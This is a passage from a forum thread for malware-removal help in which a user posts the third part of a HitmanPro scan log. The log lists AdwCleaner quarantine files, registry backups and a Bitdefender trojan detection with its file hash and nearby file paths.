          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\md.xml
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Ranzumstring.exe.config
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Singlestock.bin
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\String-Tax.bin
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\TrioDex.bin
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Triszap.dll
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\uninstall.dat
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\White-Fan.dat
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\WhiteDox.bin
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\ZamIng.bin
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\ondemand\
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Bluedax.bin
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe.config
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\conf.config
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Config.xml
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Driphotity.bin
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Duosolodax.bin
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Fasefax.bin
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe.config
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\HotSansoft.dat
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ItTone.dll
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Lexitone.bin
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\md.xml
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Singlesoft.dat
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Stockdax.dll
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Tonin.bin
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Tris-Ex.bin
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\uninstall.dat
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Ventokix.dat
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Viafix.exe
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Viafix.exe.config
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Villa-Hold.exe.config
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.d.dat
          0.6s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.dat
          0.6s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.exe
          0.6s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ondemand\
          0.6s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\
          0.6s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\ff.HP
          0.6s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\ff.NT
          0.6s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\snp.sc
          0.7s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\
          0.7s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe
          0.7s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe.config
          0.7s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\
          0.7s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\MIO.exe
          0.7s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\loader\
          0.8s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\
          0.8s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\QQLive\
          0.8s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\QQLive\FailRecord.dat
          0.9s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\
          0.9s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\
          0.9s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\
          0.9s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\prefs.js
          0.9s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\profiles.ini
          0.9s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\search.json.mozlz4
          0.9s C:\AdwCleaner\quarantine\files\vmyvkvouddwsanzcpfxrsjstzoesyukt\
          1.0s C:\AdwCleaner\quarantine\files\tkciylhxjmjrsbkzilrsksghwrxdouwq.back
          1.0s C:\AdwCleaner\quarantine\files\tzkoudrhqdrxzafwrmattbrwocwqewox.back
          1.0s C:\AdwCleaner\quarantine\files\nshnbphtlfdcaukurihucucbktvgrfuo.back
          1.1s C:\AdwCleaner\quarantine\files\lmegeqgwylgczmaugdncsoezrlfzdoow.back
          1.1s C:\AdwCleaner\quarantine\files\jidemsxupjpciijhzmqsoapuszhucfag.back
          1.1s C:\AdwCleaner\quarantine\files\hovlhcazljxzijuasrytdrtppuewtjam.back
          1.2s C:\AdwCleaner\quarantine\files\haajwoohpxztstxrtlhafsitfachjfmo.back
          1.2s C:\AdwCleaner\quarantine\files\apahvfitktjkzxvophzxcnioqbzksoqp.back
          1.2s C:\AdwCleaner\quarantine\files\fcvkhhaoafpnxinpxgtocpatvxdtiqvt.back
          1.2s C:\AdwCleaner\quarantine\files\evdtaqdoxakozjrppozslhkcjflrsund.back
          1.2s C:\AdwCleaner\quarantine\files\lrqkzkhhahecbbcndzqmcwucjlkucmif.back
          1.3s C:\AdwCleaner\quarantine\files\qekectrwctgkojzdhesvpgxwktxrjwbn.back
          1.3s C:\AdwCleaner\quarantine\files\xdheuyqjkchvboalodcocshwqpwapmas.back
          1.3s C:\AdwCleaner\quarantine\files\mkbhzixtozltywkkpgaztynbkuphdtdb.back
          1.3s C:\AdwCleaner\quarantine\files\pvosypxagsihssgnjyfyxcwezatewwum.back
          1.4s C:\AdwCleaner\quarantine\files\lqpsdbkmnkknxibvwwrsonrtakjijpzu.back
          1.4s C:\AdwCleaner\quarantine\files\smzcjlbrmvtqhfjhyginjshoqyjufruc.back
          1.4s C:\AdwCleaner\quarantine\files\damxwnvkbnzxtjfflsokifcgmotwrhpw.back
          1.4s C:\AdwCleaner\quarantine\files\virksncfeyszdlxcyurmcuhplcofsgcf.back
          1.5s C:\AdwCleaner\quarantine\files\glmtsyrtzckgrfjmnvaqymozloxekiil.back
          1.5s C:\AdwCleaner\quarantine\files\rzdkuelrbnuivrifmnklgfxvzzfrvetc.back
          1.5s C:\AdwCleaner\quarantine\files\uqtgfxjilungjdiyzwpzlmnwefohuhgy.back
          1.5s C:\AdwCleaner\quarantine\files\idflognkmdzjcvmbaecywvfxzubejjvu.back
          1.5s C:\AdwCleaner\quarantine\files\lqcgezgrlidhgtrhvxcomfelfgvdmvyt.back
          1.8s C:\AdwCleaner\quarantine\registry\reg_puhxbxsquvaobuhyfxejnebggtrfpdeq.reg
          1.9s C:\AdwCleaner\quarantine\registry\reg_tmimdswbkadtxhvqgdhuqpvbglcbmfdu.reg
          2.0s C:\AdwCleaner\quarantine\registry\reg_jdlnivjcusbkbrzcygoyhzspwyxlyggf.reg
          2.0s C:\AdwCleaner\quarantine\registry\reg_tfhkhetuluciyaeqriuqioeuyoypyxsy.reg
          2.0s C:\AdwCleaner\quarantine\registry\reg_elkwfsgmzobfidhvzhqpengxndnbnqrs.reg
          2.1s C:\AdwCleaner\quarantine\registry\reg_okibrbkxfqdrpthgjuptyhhyzfabxmei.reg
          2.1s C:\AdwCleaner\quarantine\registry\reg_wubsvososrzoldxnlntxwvkilyudnzeu.reg
          2.2s C:\AdwCleaner\quarantine\registry\reg_ldpgxoqehdbkeznqasdwthjtqljlfwbl.reg
          2.2s C:\AdwCleaner\quarantine\registry\reg_hoouldollkztgqhqkqlgbdtkjmjzbndm.reg
          2.2s C:\AdwCleaner\quarantine\registry\reg_tkndfadidnoselgvemeyjwzivzkdbfsi.reg
          2.3s C:\AdwCleaner\quarantine\registry\reg_dsvfxsmbfjqlgrtincrhckelkjmocsol.reg
          2.9s C:\AdwCleaner\quarantine\registry\reg_seqodqpqwkrfpncsawgyzpxawzputenw.reg
          3.0s C:\AdwCleaner\quarantine\registry\reg_icpltxjlklnkocbqgtzcggknkvebnjvv.reg
          3.0s C:\AdwCleaner\quarantine\registry\reg_gmmujjdiivebrljiqcjqctecrzmlbyoe.reg
          3.1s C:\AdwCleaner\quarantine\registry\reg_marasmtdffiyjsmfqktvvuzjrivxsool.reg
          3.2s C:\AdwCleaner\quarantine\registry\reg_cmqgxeamdfpuzwtxoepvczvloonypdwp.reg
          3.3s C:\AdwCleaner\quarantine\registry\reg_lyunspfrbhzgbwusmxmwbspblyhrulwy.reg
          3.5s C:\AdwCleaner\quarantine\registry\reg_lwqsugvxxjtyhoqpxtxtnpeygapjoxhm.reg
          3.6s C:\AdwCleaner\quarantine\registry\reg_pyvlcgypjrojemqatqyyrbrphjoxkdab.reg
          3.6s C:\AdwCleaner\quarantine\registry\reg_nhlqlirecitexubpkgzdofmsimewbpcz.reg
          3.7s C:\AdwCleaner\quarantine\registry\reg_xghjlxwlgaktwtkvamwqizmfzfhbckpp.reg
          3.8s C:\AdwCleaner\quarantine\registry\reg_zxsarcdkskpcuvedhjhhddlsqbgzdvzl.reg
          3.9s C:\AdwCleaner\quarantine\registry\reg_fxqtuaqoisrzsghbjocryzmwbqxxrjmj.reg
          3.9s C:\AdwCleaner\quarantine\registry\reg_ghlbbvjeqsokgnupaxajeyvokkfwkbnh.reg
          4.3s C:\AdwCleaner\quarantine\registry\reg_unkuocqomdygzgpxiizglrioehoicjtw.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_ecyvuvgkunhnpfrrpafwfcsnhgaoljbe.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_ekwhxwvhltpkcpkavxnduhlgzgslyema.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_eggguycnntdekswyvzoyybdcedlmfkjm.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_rcexoyuquzinpyavyncsanjofviavxjk.reg
          4.5s C:\AdwCleaner\quarantine\registry\reg_lpbfohsuttixwzckzjvtadqmofpumzjy.reg
          4.5s C:\AdwCleaner\quarantine\registry\reg_ydwyyidsknzaljhhqvwxrjwcxayioedb.reg
          4.5s C:\AdwCleaner\quarantine\registry\reg_pjqrynmploqoznlaxrdefubadvvlkzmm.reg
          4.6s C:\AdwCleaner\quarantine\registry\reg_daspbjyasdxdvwwwggsvvhrmzgxpnshh.reg
          4.6s C:\AdwCleaner\quarantine\registry\reg_cuetcglxejoqlxnssrmciebndydxhdrt.reg
          4.6s C:\AdwCleaner\quarantine\registry\reg_xurnwhaxeqtdzlbnzpjbokafxnxsiqum.reg
          4.7s C:\AdwCleaner\quarantine\registry\reg_tkqingwmwszmeptvclzuroubstvcckhw.reg
          4.7s C:\AdwCleaner\quarantine\registry\reg_mcoutunprxdphivyuvmoatwdyuxhyzwb.reg
          4.8s C:\AdwCleaner\quarantine\registry\reg_tgfeavmdtxngkczofnkyzphiqdfwhsfl.reg
          4.8s C:\AdwCleaner\quarantine\registry\reg_mhdzapqmugdydwjjqicquolddejvwqup.reg
          4.8s C:\AdwCleaner\quarantine\registry\reg_gzmkcboyfqzjhwapfhvqeofjaefhcttm.reg
          4.9s C:\AdwCleaner\quarantine\registry\reg_vazsqhuudufaewoypbfbikwgzqcgqfkc.reg
          4.9s C:\AdwCleaner\quarantine\registry\reg_lwugahqruqrqqjgikiohovxoculwwysx.reg
          5.0s C:\AdwCleaner\quarantine\registry\reg_xeczysjuynsfncsdctquwwgkbnofarzi.reg
          5.6s C:\AdwCleaner\quarantine\registry\reg_iioxwxczjbugugmwqmnueuszmpfqonbi.reg
          5.6s C:\AdwCleaner\quarantine\registry\reg_vrtdutftxfxohlxvramxkkrsqrnaioij.reg
          5.6s C:\AdwCleaner\quarantine\registry\reg_yvmqqvbcuamwvndvtdhefjuqlupmqiha.reg
          5.6s C:\AdwCleaner\quarantine\registry\reg_lwsnkfiuxbhfwjtitvqqzgtpowncmeix.reg
          5.7s C:\AdwCleaner\quarantine\registry\reg_fqcstvuljsuvdliaqoxcapwdameertol.reg
          5.7s C:\AdwCleaner\quarantine\registry\reg_ejsdpauzkeqyotivjhaivmsazspfnnay.reg
          5.7s C:\AdwCleaner\quarantine\registry\reg_yrdzjxchjfseqziayavxdwxeptdtlkom.reg
          5.8s C:\AdwCleaner\quarantine\registry\reg_peqwhjahmytfugksxniwczmpsseymesr.reg
          5.8s C:\AdwCleaner\quarantine\registry\reg_kiusmmvbvgzfcybhqmdrtdwqslscapcd.reg
          5.9s C:\AdwCleaner\quarantine\registry\reg_dtrxafqawoycuacbklvwcnjucjtvfqrq.reg
          6.0s C:\AdwCleaner\quarantine\registry\reg_mpldfxlkqddfqxemmzqxdxycwdwdxush.reg
          6.0s C:\AdwCleaner\quarantine\registry\reg_fiqaqrowoznmrtaduhmmjmdxvzunfivg.reg
          6.1s C:\AdwCleaner\quarantine\registry\reg_mmnettjvbtwenjqfrqilocfnkutzspil.reg
          6.2s C:\AdwCleaner\quarantine\registry\reg_diurulmulfktzboavnxvdildottqhhjx.reg
          6.2s C:\AdwCleaner\quarantine\registry\reg_xrqifbvohcnregydcpounrtfyrmjgmni.reg
          6.3s C:\AdwCleaner\quarantine\registry\reg_sjcuxpukaattukjmzpshxzvediwsgupz.reg
          7.0s C:\Windows\Prefetch\WUDFHOST.EXE-AFFEF87C.pf
          7.4s C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winsock-WS2HELP%4Operational.evtx
          7.9s C:\Windows\Prefetch\NVDISPLAY.CONTAINER.EXE-98FFF787.pf
          8.1s C:\Windows\Prefetch\NVTELEMETRYCONTAINER.EXE-80BD8541.pf
         12.0s C:\Windows\Prefetch\SPOOLSV.EXE-D1F6B8B6.pf

BaBi · 13.02.2017, 22:57

hitman teil 3

Code:

ATTFilter

C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe
      Size . . . . . . . : 153.600 bytes
      Age  . . . . . . . : 0.1 days (2017-02-13 20:38:16)
      Entropy  . . . . . : 7.1
      SHA-256  . . . . . : F2D67E6C8C9CFD71B8B30D1C296E211AA5EDFFE9E029A1FECADEF8733C75EA80
      Needs elevation  . : Yes
      Product  . . . . . : Micro
      Publisher  . . . . : Takila
      Description  . . . : Monday Monday
      Version  . . . . . : 4.3.5.4
      LanguageID . . . . : 0
    > Bitdefender  . . . : Trojan.GenericKD.4370272
      Fuzzy  . . . . . . : 106.0
      Forensic Cluster
         -2.5s C:\ProgramData\NVIDIA\MessageBus_4656_0x24D19933300.log
         -2.5s C:\ProgramData\NVIDIA\MessageBus_4656_0x24D18F34700.log
         -2.2s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\
         -2.2s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\LICENSE.txt
         -2.2s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\openweb.bat
         -2.2s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\SnareWindowsInstallSupport.dll
         -2.2s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\stopweb.bat
         -2.2s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\s_32.ico
         -2.2s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\WinSnare.dll
         -2.1s C:\AdwCleaner\quarantine\files\mvmfgnrbrmdbsjisivmhfrvdpvtlbouw\
         -2.0s C:\AdwCleaner\quarantine\files\fpfqjlppnsdxcoxxfuaeemqptrzrgvpn\
         -2.0s C:\AdwCleaner\quarantine\files\fpfqjlppnsdxcoxxfuaeemqptrzrgvpn\BITB16.tmp
         -2.0s C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_2d44ca29ef1bb45be9e81bd7c7de23bb1bff79c7_e127e73b_1c458c2c\
         -2.0s C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_2d44ca29ef1bb45be9e81bd7c7de23bb1bff79c7_e127e73b_1c458c2c\Report.wer
         -1.9s C:\AdwCleaner\quarantine\files\wlhkcwthzxcfadlnsnitwidocovyfcvy\
         -1.9s C:\AdwCleaner\quarantine\files\wlhkcwthzxcfadlnsnitwidocovyfcvy\BITB27.tmp
         -1.9s C:\AdwCleaner\quarantine\files\lvghxrkdvjdmjauuvlqiouualgvwchnk\
         -1.8s C:\AdwCleaner\quarantine\files\atsifbjehqqalokjotexydyeaawktlln\
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\cookies
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\cookies-journal
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Web Data
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Web Data-journal
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\001180cbc33c583f_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\02cdb733b079655d_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\08bc571418449ead_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\092f95ee9c1fc61c_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ad89b7fc5facf78_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0e02ff08b4002e57_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ed73590870cfbd2_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ed7399215f555d7_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ef5b10d79d9f0cb_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0fc3db66b9cbe75d_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1b72c2d37a2af109_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1dff67c9badf383d_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1e20774a42d716f3_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1f2ec90a78c46fdf_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2009bcf78a35d470_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\20ba89671f087fc1_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\234986793e71f265_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\26968e7a0c71776d_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2819c5233c1f77b4_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2ac381ccd53e2ce0_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2b11e2e523e5d524_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\3082972055161e5d_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\3a977894dc0fcd39_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\442182c02ee0a243_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\5125b9f58b582f46_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\593d0e1547012291_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\5ede7465ad814101_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\66928cc3398bdbc9_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\66e510668b4796e9_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\6e2284174f43f7b0_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\711f9f610e35a8b6_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7150bac3e922a373_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7589f80f2ddeab29_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\775e37b82f99c13c_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7acdc9382bf6b139_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7d8cebaadfd53fbf_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7ecc93dfade6cf4e_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8326a92c0f293bc4_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\83a226c1379f7a18_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\86850034110cf1c4_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8d9b27c428a8f6a3_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8f60e69a4afd6f60_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\95ff98c7e9c1b8a3_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a1f309cd5a3eb6fa_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a2719229322771c8_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a2e6c4ddc62e67a7_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b07d05bc07d9c08b_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b3986aa6d1a5b1ca_0
         -1.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b3edef432256edd5_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b48454e7eeb33014_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\ba7c73f14dafe451_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\bd48447363dfb226_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\be189d201694bf89_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\bfbe9938bbb38577_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c0676a458818319d_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c3329b5e71fb9773_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c487316b1c7eb401_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c8bff37e9d993e8c_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c94b3024dfacfceb_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c9efb04ec241100a_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cd31a5585d55d245_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cd87b6402756547b_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cda276472aafd1d9_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cdd7d0e76bb75c18_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\ce8699f098de9a28_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d19a15ac54bfa3ba_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d652598e0bff0a74_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d85bf4971be98d9f_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\dc7c883ebdb4ce43_0
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\dd1fa8967c9eedf1_0
